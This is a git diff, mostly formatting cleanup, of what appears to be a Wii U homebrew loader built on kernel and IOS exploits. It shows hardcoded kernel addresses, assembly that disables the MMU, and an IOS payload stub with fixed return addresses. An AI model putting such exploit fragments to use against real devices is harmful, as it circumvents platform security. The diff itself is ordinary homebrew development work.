+#define disable_interrupts ((int (*)()) 0x0812E778)
+#define enable_interrupts ((int (*)(int)) 0x0812E78C)
+#define kernel_bsp_command_5 ((int (*)(const char *, int offset, const char *, int size, void *buffer)) 0x0812EC40)
 void reverse_memcpy(void *dest, const void *src, unsigned int size);
 static inline unsigned int disable_mmu(void) {
 unsigned int control_register = 0;
- asm volatile("MRC p15, 0, %0, c1, c0, 0" : "=r" (control_register));
- asm volatile("MCR p15, 0, %0, c1, c0, 0" : : "r" (control_register & 0xFFFFEFFA));
+ asm volatile("MRC p15, 0, %0, c1, c0, 0"
+ : "=r"(control_register));
+ asm volatile("MCR p15, 0, %0, c1, c0, 0"
+ :
+ : "r"(control_register & 0xFFFFEFFA));
 return control_register;
 }
 static inline void restore_mmu(unsigned int control_register) {
- asm volatile("MCR p15, 0, %0, c1, c0, 0" : : "r" (control_register));
+ asm volatile("MCR p15, 0, %0, c1, c0, 0"
+ :
+ : "r"(control_register));
 }
 static inline void set_domain_register(unsigned int domain_register) {
- asm volatile("MCR p15, 0, %0, c3, c0, 0" : : "r" (domain_register));
+ asm volatile("MCR p15, 0, %0, c3, c0, 0"
+ :
+ : "r"(domain_register));
 }
 #endif
diff --git a/source/ios_usb/source/main.c b/source/ios_usb/source/main.c
index f82962f..fab8ea6 100644
--- a/source/ios_usb/source/main.c
+++ b/source/ios_usb/source/main.c
@@ -5,7 +5,7 @@ void _main() {
 int (*reply)(int, int) = (int (*)(int, int)) 0x1012ED04;
 int saved_handle = *(volatile int *) 0x0012F000;
- int myret = reply(saved_handle, 0);
+ int myret = reply(saved_handle, 0);
 if (myret != 0) {
 ios_shutdown(1);
 }
@@ -20,5 +20,4 @@ void _main() {
 "newlr: .word 0x1012EACC\n"
 "newr0: .word 0x10146080\n"
 "newpc: .word 0x10111164\n");
-
 }
diff --git a/source/main.cpp b/source/main.cpp
index 223a5c0..988ae19 100644
--- a/source/main.cpp
+++ b/source/main.cpp
@@ -1,25 +1,25 @@
+#include
 #include
 #include
-#include
 #include
 #include
-#include
-#include
 #include
+#include
+#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include "utils/logger.h"
 #include "ElfUtils.h"
 #include "ios_exploit.h"
+#include "utils/logger.h"
+#include
+#include
+#include
+#include
+#include
+#include
+#include
 #include "gx2sploit.h"
@@ -65,11 +65,11 @@ int main(int argc, char **argv) {
 }
 bool loadWithoutHacks = false;
- bool kernelDone = false;
- bool skipKernel = false;
+ bool kernelDone = false;
+ bool skipKernel = false;
 if ((btn & VPAD_BUTTON_R) == VPAD_BUTTON_R) {
- skipKernel = true;
+ skipKernel = true;
 loadWithoutHacks = true;
 }
 if ((btn & VPAD_BUTTON_ZR) == VPAD_BUTTON_ZR) {
@@ -120,7 +120,7 @@ int main(int argc, char **argv) {
 forceDefaultTitleIDToWiiUMenu();
 nn::act::Initialize();
- nn::act::SlotNo slot = nn::act::GetSlotNo();
+ nn::act::SlotNo slot = nn::act::GetSlotNo();
 nn::act::SlotNo defaultSlot = nn::act::GetDefaultAccount();
 nn::act::Finalize();
@@ -145,7 +145,7 @@ int main(int argc, char **argv) {
 return 0;
 }
-void forceDefaultTitleIDToWiiUMenu() {// Restore the default title id to the normal Wii U Menu.
+void forceDefaultTitleIDToWiiUMenu() { // Restore the default title id to the normal Wii U Menu.
 unsigned long long sysmenuIdUll = _SYSGetSystemApplicationTitleId(SYSTEM_APP_ID_HOME_MENU);
 memcpy((void *) 0xF417FFF0, &sysmenuIdUll, 8);
 DCStoreRange((void *) 0xF417FFF0, 0x8);
diff --git a/source/utils/logger.h b/source/utils/logger.h
index 9b5195f..8b71325 100644
--- a/source/utils/logger.h
+++ b/source/utils/logger.h
@@ -1,20 +1,20 @@
 #pragma once
-#include
 #include
+#include
 #ifdef __cplusplus
 extern "C" {
 #endif
 #define __FILENAME_X__ (strrchr(__FILE__, '\\') ? strrchr(__FILE__, '\\') + 1 : __FILE__)
-#define __FILENAME__ (strrchr(__FILE__, '/') ? strrchr(__FILE__, '/') + 1 : __FILENAME_X__)
+#define __FILENAME__ (strrchr(__FILE__, '/') ? strrchr(__FILE__, '/') + 1 : __FILENAME_X__)
-#define DEBUG_FUNCTION_LINE(FMT, ARGS...)do { \
- WHBLogPrintf("[%23s]%30s@L%04d: " FMT "",__FILENAME__,__FUNCTION__, __LINE__, ## ARGS); \
+#define DEBUG_FUNCTION_LINE(FMT, ARGS...) \
+ do { \
+ WHBLogPrintf("[%23s]%30s@L%04d: " FMT "", __FILENAME__, __FUNCTION__, __LINE__, ##ARGS); \
 } while (0)
 #ifdef __cplusplus
 }
 #endif
-